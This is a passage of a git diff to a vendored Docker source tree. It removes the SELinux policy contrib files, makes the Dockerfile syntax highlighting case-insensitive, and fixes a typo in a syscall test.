diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile deleted file mode 100644 index 1bdc695afe..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile +++ /dev/null @@ -1,16 +0,0 @@ -TARGETS?=docker -MODULES?=${TARGETS:=.pp.bz2} -SHAREDIR?=/usr/share - -all: ${TARGETS:=.pp.bz2} - -%.pp.bz2: %.pp - @echo Compressing $^ -\> $@ - bzip2 -9 $^ - -%.pp: %.te - make -f ${SHAREDIR}/selinux/devel/Makefile $@ - -clean: - rm -f *~ *.tc *.pp *.pp.bz2 - rm -rf tmp *.tar.gz diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc deleted file mode 100644 index 467d659604..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc +++ /dev/null @@ -1,18 +0,0 @@ -/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) - -/usr/bin/dockerd -- gen_context(system_u:object_r:docker_exec_t,s0) - -/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) - -/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) - -/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) - -/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) - -/var/lib/docker/init(/.*)? 
gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if deleted file mode 100644 index ca075c05c5..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if +++ /dev/null @@ -1,461 +0,0 @@ - -## The open-source application container engine. - -######################################## -## -## Execute docker in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_domtrans',` - gen_require(` - type docker_t, docker_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_exec_t, docker_t) -') - -######################################## -## -## Execute docker in the caller domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_exec',` - gen_require(` - type docker_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_exec_t) -') - -######################################## -## -## Search docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_search_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - files_search_var_lib($1) -') - -######################################## -## -## Execute docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - can_exec($1, docker_var_lib_t) -') - -######################################## -## -## Read docker lib files. -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_read_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Read docker share files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_share_files',` - gen_require(` - type docker_share_t; - ') - - files_search_var_lib($1) - read_files_pattern($1, docker_share_t, docker_share_t) -') - -######################################## -## -## Manage docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) - manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Manage docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_dirs',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Create objects in a docker var lib directory -## with an automatic type transition to -## a specified private type. -## -## -## -## Domain allowed access. -## -## -## -## -## The type of the object to create. -## -## -## -## -## The class of the object to be created. -## -## -## -## -## The name of the object being created. -## -## -# -interface(`docker_lib_filetrans',` - gen_require(` - type docker_var_lib_t; - ') - - filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) -') - -######################################## -## -## Read docker PID files. -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_read_pid_files',` - gen_require(` - type docker_var_run_t; - ') - - files_search_pids($1) - read_files_pattern($1, docker_var_run_t, docker_var_run_t) -') - -######################################## -## -## Execute docker server in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_systemctl',` - gen_require(` - type docker_t; - type docker_unit_file_t; - ') - - systemd_exec_systemctl($1) - init_reload_services($1) - systemd_read_fifo_file_passwd_run($1) - allow $1 docker_unit_file_t:file read_file_perms; - allow $1 docker_unit_file_t:service manage_service_perms; - - ps_process_pattern($1, docker_t) -') - -######################################## -## -## Read and write docker shared memory. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_rw_sem',` - gen_require(` - type docker_t; - ') - - allow $1 docker_t:sem rw_sem_perms; -') - -####################################### -## -## Read and write the docker pty type. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_use_ptys',` - gen_require(` - type docker_devpts_t; - ') - - allow $1 docker_devpts_t:chr_file rw_term_perms; -') - -####################################### -## -## Allow domain to create docker content -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_filetrans_named_content',` - - gen_require(` - type docker_var_lib_t; - type docker_share_t; - type docker_log_t; - type docker_var_run_t; - type docker_home_t; - ') - - files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") - files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") - files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") - files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") - userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") -') - -######################################## -## -## Connect to docker over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_stream_connect',` - gen_require(` - type docker_t, docker_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) -') - -######################################## -## -## Connect to SPC containers over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_spc_stream_connect',` - gen_require(` - type spc_t, spc_var_run_t; - ') - - files_search_pids($1) - files_write_all_pid_sockets($1) - allow $1 spc_t:unix_stream_socket connectto; -') - - -######################################## -## -## All of the rules required to administrate -## an docker environment -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_admin',` - gen_require(` - type docker_t; - type docker_var_lib_t, docker_var_run_t; - type docker_unit_file_t; - type docker_lock_t; - type docker_log_t; - type docker_config_t; - ') - - allow $1 docker_t:process { ptrace signal_perms }; - ps_process_pattern($1, docker_t) - - admin_pattern($1, docker_config_t) - - files_search_var_lib($1) - admin_pattern($1, docker_var_lib_t) - - files_search_pids($1) - admin_pattern($1, docker_var_run_t) - - files_search_locks($1) - admin_pattern($1, docker_lock_t) - - logging_search_logs($1) - admin_pattern($1, docker_log_t) - - docker_systemctl($1) - admin_pattern($1, docker_unit_file_t) - allow $1 docker_unit_file_t:service all_service_perms; - - optional_policy(` - systemd_passwd_agent_exec($1) - systemd_read_fifo_file_passwd_run($1) - ') -') - -interface(`domain_stub_named_filetrans_domain',` - gen_require(` - attribute named_filetrans_domain; - ') -') - -interface(`lvm_stub',` - gen_require(` - type lvm_t; - ') -') -interface(`staff_stub',` - gen_require(` - type staff_t; - ') -') -interface(`virt_stub_svirt_sandbox_domain',` - gen_require(` - attribute svirt_sandbox_domain; - ') -') -interface(`virt_stub_svirt_sandbox_file',` - gen_require(` - type svirt_sandbox_file_t; - ') -') -interface(`fs_dontaudit_remount_tmpfs',` - gen_require(` - type tmpfs_t; - ') - - dontaudit $1 tmpfs_t:filesystem remount; -') -interface(`dev_dontaudit_list_all_dev_nodes',` - gen_require(` - type device_t; - ') - - dontaudit $1 device_t:dir list_dir_perms; -') -interface(`kernel_unlabeled_entry_type',` - gen_require(` - type unlabeled_t; - ') - - domain_entry_file($1, unlabeled_t) -') -interface(`kernel_unlabeled_domtrans',` - gen_require(` - type unlabeled_t; - ') - - read_lnk_files_pattern($1, unlabeled_t, unlabeled_t) - domain_transition_pattern($1, unlabeled_t, $2) - type_transition $1 unlabeled_t:process $2; -') -interface(`files_write_all_pid_sockets',` - gen_require(` - attribute pidfile; - ') - - allow $1 
pidfile:sock_file write_sock_file_perms; -') -interface(`dev_dontaudit_mounton_sysfs',` - gen_require(` - type sysfs_t; - ') - - dontaudit $1 sysfs_t:dir mounton; -') diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te deleted file mode 100644 index bad0bb6e4c..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te +++ /dev/null @@ -1,407 +0,0 @@ -policy_module(docker, 1.0.0) - -######################################## -# -# Declarations -# - -## -##

-## Determine whether docker can -## connect to all TCP ports. -##

-##
-gen_tunable(docker_connect_any, false) - -type docker_t; -type docker_exec_t; -init_daemon_domain(docker_t, docker_exec_t) -domain_subj_id_change_exemption(docker_t) -domain_role_change_exemption(docker_t) - -type spc_t; -domain_type(spc_t) -role system_r types spc_t; - -type spc_var_run_t; -files_pid_file(spc_var_run_t) - -type docker_var_lib_t; -files_type(docker_var_lib_t) - -type docker_home_t; -userdom_user_home_content(docker_home_t) - -type docker_config_t; -files_config_file(docker_config_t) - -type docker_lock_t; -files_lock_file(docker_lock_t) - -type docker_log_t; -logging_log_file(docker_log_t) - -type docker_tmp_t; -files_tmp_file(docker_tmp_t) - -type docker_tmpfs_t; -files_tmpfs_file(docker_tmpfs_t) - -type docker_var_run_t; -files_pid_file(docker_var_run_t) - -type docker_unit_file_t; -systemd_unit_file(docker_unit_file_t) - -type docker_devpts_t; -term_pty(docker_devpts_t) - -type docker_share_t; -files_type(docker_share_t) - -######################################## -# -# docker local policy -# -allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; -allow docker_t self:tun_socket relabelto; -allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; -allow docker_t self:fifo_file rw_fifo_file_perms; -allow docker_t self:unix_stream_socket create_stream_socket_perms; -allow docker_t self:tcp_socket create_stream_socket_perms; -allow docker_t self:udp_socket create_socket_perms; -allow docker_t self:capability2 block_suspend; - -manage_files_pattern(docker_t, docker_home_t, docker_home_t) -manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) -manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) -userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") - -manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) -manage_files_pattern(docker_t, docker_config_t, docker_config_t) -files_etc_filetrans(docker_t, docker_config_t, dir, 
"docker") - -manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) -manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) - -manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) -manage_files_pattern(docker_t, docker_log_t, docker_log_t) -manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) -logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) -allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; - -manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -allow docker_t docker_tmpfs_t:dir relabelfrom; -can_exec(docker_t, docker_tmpfs_t) -fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) -allow docker_t docker_tmpfs_t:chr_file mounton; - -manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) -manage_files_pattern(docker_t, docker_share_t, docker_share_t) -manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) -allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; - -can_exec(docker_t, docker_share_t) -#docker_filetrans_named_content(docker_t) - -manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_lnk_files_pattern(docker_t, 
docker_var_lib_t, docker_var_lib_t) -allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; -files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) - -allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; -term_create_pty(docker_t, docker_devpts_t) - -kernel_read_system_state(docker_t) -kernel_read_network_state(docker_t) -kernel_read_all_sysctls(docker_t) -kernel_rw_net_sysctls(docker_t) -kernel_setsched(docker_t) -kernel_read_all_proc(docker_t) - -domain_use_interactive_fds(docker_t) -domain_dontaudit_read_all_domains_state(docker_t) - -corecmd_exec_bin(docker_t) -corecmd_exec_shell(docker_t) - -corenet_tcp_bind_generic_node(docker_t) -corenet_tcp_sendrecv_generic_if(docker_t) -corenet_tcp_sendrecv_generic_node(docker_t) -corenet_tcp_sendrecv_generic_port(docker_t) -corenet_tcp_bind_all_ports(docker_t) -corenet_tcp_connect_http_port(docker_t) -corenet_tcp_connect_commplex_main_port(docker_t) -corenet_udp_sendrecv_generic_if(docker_t) -corenet_udp_sendrecv_generic_node(docker_t) -corenet_udp_sendrecv_all_ports(docker_t) -corenet_udp_bind_generic_node(docker_t) -corenet_udp_bind_all_ports(docker_t) - -files_read_config_files(docker_t) -files_dontaudit_getattr_all_dirs(docker_t) -files_dontaudit_getattr_all_files(docker_t) - -fs_read_cgroup_files(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_search_all(docker_t) -fs_getattr_all_fs(docker_t) - -storage_raw_rw_fixed_disk(docker_t) - -auth_use_nsswitch(docker_t) -auth_dontaudit_getattr_shadow(docker_t) - -init_read_state(docker_t) -init_status(docker_t) - 
-logging_send_audit_msgs(docker_t) -logging_send_syslog_msg(docker_t) - -miscfiles_read_localization(docker_t) - -mount_domtrans(docker_t) - -seutil_read_default_contexts(docker_t) -seutil_read_config(docker_t) - -sysnet_dns_name_resolve(docker_t) -sysnet_exec_ifconfig(docker_t) - -optional_policy(` - rpm_exec(docker_t) - rpm_read_db(docker_t) - rpm_exec(docker_t) -') - -optional_policy(` - fstools_domtrans(docker_t) -') - -optional_policy(` - iptables_domtrans(docker_t) -') - -optional_policy(` - openvswitch_stream_connect(docker_t) -') - -allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; - -allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; - -allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; -allow docker_t self:netlink_audit_socket create_netlink_socket_perms; -allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; -allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; - -allow docker_t docker_var_lib_t:dir mounton; -allow docker_t docker_var_lib_t:chr_file mounton; -can_exec(docker_t, docker_var_lib_t) - -kernel_dontaudit_setsched(docker_t) -kernel_get_sysvipc_info(docker_t) -kernel_request_load_module(docker_t) -kernel_mounton_messages(docker_t) -kernel_mounton_all_proc(docker_t) -kernel_mounton_all_sysctls(docker_t) -kernel_unlabeled_entry_type(spc_t) -kernel_unlabeled_domtrans(docker_t, spc_t) - -dev_getattr_all(docker_t) -dev_getattr_sysfs_fs(docker_t) -dev_read_urand(docker_t) -dev_read_lvm_control(docker_t) -dev_rw_sysfs(docker_t) -dev_rw_loop_control(docker_t) -dev_rw_lvm_control(docker_t) - -files_getattr_isid_type_dirs(docker_t) -files_manage_isid_type_dirs(docker_t) -files_manage_isid_type_files(docker_t) -files_manage_isid_type_symlinks(docker_t) -files_manage_isid_type_chr_files(docker_t) -files_manage_isid_type_blk_files(docker_t) -files_exec_isid_files(docker_t) -files_mounton_isid(docker_t) 
-files_mounton_non_security(docker_t) -files_mounton_isid_type_chr_file(docker_t) - -fs_mount_all_fs(docker_t) -fs_unmount_all_fs(docker_t) -fs_remount_all_fs(docker_t) -files_mounton_isid(docker_t) -fs_manage_cgroup_dirs(docker_t) -fs_manage_cgroup_files(docker_t) -fs_relabelfrom_xattr_fs(docker_t) -fs_relabelfrom_tmpfs(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_list_hugetlbfs(docker_t) - -term_use_generic_ptys(docker_t) -term_use_ptmx(docker_t) -term_getattr_pty_fs(docker_t) -term_relabel_pty_fs(docker_t) -term_mounton_unallocated_ttys(docker_t) - -modutils_domtrans_insmod(docker_t) - -systemd_status_all_unit_files(docker_t) -systemd_start_systemd_services(docker_t) - -userdom_stream_connect(docker_t) -userdom_search_user_home_content(docker_t) -userdom_read_all_users_state(docker_t) -userdom_relabel_user_home_files(docker_t) -userdom_relabel_user_tmp_files(docker_t) -userdom_relabel_user_tmp_dirs(docker_t) - -optional_policy(` - gpm_getattr_gpmctl(docker_t) -') - -optional_policy(` - dbus_system_bus_client(docker_t) - init_dbus_chat(docker_t) - init_start_transient_unit(docker_t) - - optional_policy(` - systemd_dbus_chat_logind(docker_t) - ') - - optional_policy(` - firewalld_dbus_chat(docker_t) - ') -') - -optional_policy(` - udev_read_db(docker_t) -') - -optional_policy(` - virt_read_config(docker_t) - virt_exec(docker_t) - virt_stream_connect(docker_t) - virt_stream_connect_sandbox(docker_t) - virt_exec_sandbox_files(docker_t) - virt_manage_sandbox_files(docker_t) - virt_relabel_sandbox_filesystem(docker_t) - virt_transition_svirt_sandbox(docker_t, system_r) - virt_mounton_sandbox_file(docker_t) -# virt_attach_sandbox_tun_iface(docker_t) - allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; -') - -tunable_policy(`docker_connect_any',` - corenet_tcp_connect_all_ports(docker_t) - corenet_sendrecv_all_packets(docker_t) - corenet_tcp_sendrecv_all_ports(docker_t) -') - -######################################## -# -# spc local policy -# 
-domain_entry_file(spc_t, docker_share_t) -domain_entry_file(spc_t, docker_var_lib_t) -role system_r types spc_t; - -domain_entry_file(spc_t, docker_share_t) -domain_entry_file(spc_t, docker_var_lib_t) -domtrans_pattern(docker_t, docker_share_t, spc_t) -domtrans_pattern(docker_t, docker_var_lib_t, spc_t) -allow docker_t spc_t:process { setsched signal_perms }; -ps_process_pattern(docker_t, spc_t) -allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; - -optional_policy(` - dbus_chat_system_bus(spc_t) -') - -optional_policy(` - unconfined_domain_noaudit(spc_t) -') - -optional_policy(` - unconfined_domain(docker_t) -') - -optional_policy(` - virt_transition_svirt_sandbox(spc_t, system_r) -') - -######################################## -# -# docker upstream policy -# - -optional_policy(` -# domain_stub_named_filetrans_domain() - gen_require(` - attribute named_filetrans_domain; - ') - - docker_filetrans_named_content(named_filetrans_domain) -') - -optional_policy(` - lvm_stub() - docker_rw_sem(lvm_t) -') - -optional_policy(` - staff_stub() - docker_stream_connect(staff_t) - docker_exec(staff_t) -') - -optional_policy(` - virt_stub_svirt_sandbox_domain() - virt_stub_svirt_sandbox_file() - allow svirt_sandbox_domain self:netlink_kobject_uevent_socket create_socket_perms; - docker_read_share_files(svirt_sandbox_domain) - docker_lib_filetrans(svirt_sandbox_domain,svirt_sandbox_file_t, sock_file) - docker_use_ptys(svirt_sandbox_domain) - docker_spc_stream_connect(svirt_sandbox_domain) - fs_list_tmpfs(svirt_sandbox_domain) - fs_rw_hugetlbfs_files(svirt_sandbox_domain) - fs_dontaudit_remount_tmpfs(svirt_sandbox_domain) - dev_dontaudit_mounton_sysfs(svirt_sandbox_domain) - - tunable_policy(`virt_sandbox_use_fusefs',` - fs_manage_fusefs_dirs(svirt_sandbox_domain) - fs_manage_fusefs_files(svirt_sandbox_domain) - fs_manage_fusefs_symlinks(svirt_sandbox_domain) - ') - gen_require(` - attribute domain; - ') - - dontaudit svirt_sandbox_domain domain:key {search link}; 
-') - -optional_policy(` - gen_require(` - type pcp_pmcd_t; - ') - docker_manage_lib_files(pcp_pmcd_t) -') diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz deleted file mode 100644 index ab5d59445ac1601ca378aaa3e71fb9cff43a1592..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2847 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 xb`W`pZ+>}u<Dockerfile
patterns + + captures + + 1 + + name + keyword.other.special-method.dockerfile + + 2 + + name + keyword.other.special-method.dockerfile + + + match + ^\s*\b(?i:(FROM))\b.*?\b(?i:(AS))\b + captures @@ -25,7 +42,7 @@ match - ^\s*(?:(ONBUILD)\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)\s + ^\s*(?i:(ONBUILD)\s+)?(?i:(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR))\s captures @@ -42,7 +59,7 @@ match - ^\s*(?:(ONBUILD)\s+)?(CMD|ENTRYPOINT)\s + ^\s*(?i:(ONBUILD)\s+)?(?i:(CMD|ENTRYPOINT))\s begin diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim index ee10e5d6a0..a21dd14095 100644 --- a/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim @@ -1 +1 @@ -au BufNewFile,BufRead [Dd]ockerfile,Dockerfile.* set filetype=dockerfile +au BufNewFile,BufRead [Dd]ockerfile,[Dd]ockerfile.*,*.[Dd]ockerfile set filetype=dockerfile diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/ns.c b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c index 33684e1c3d..624388630a 100644 --- a/vendor/github.com/docker/docker/contrib/syscall-test/ns.c +++ b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c @@ -20,7 +20,7 @@ static int child_exec(void *stuff) { struct clone_args *args = (struct clone_args *)stuff; if (execvp(args->argv[0], args->argv) != 0) { - fprintf(stderr, "failed to execvp argments %s\n", + fprintf(stderr, "failed to execvp arguments %s\n", strerror(errno)); exit(-1); } diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/userns.c b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c index 2af36f4228..4c5c8d304e 100644 --- 
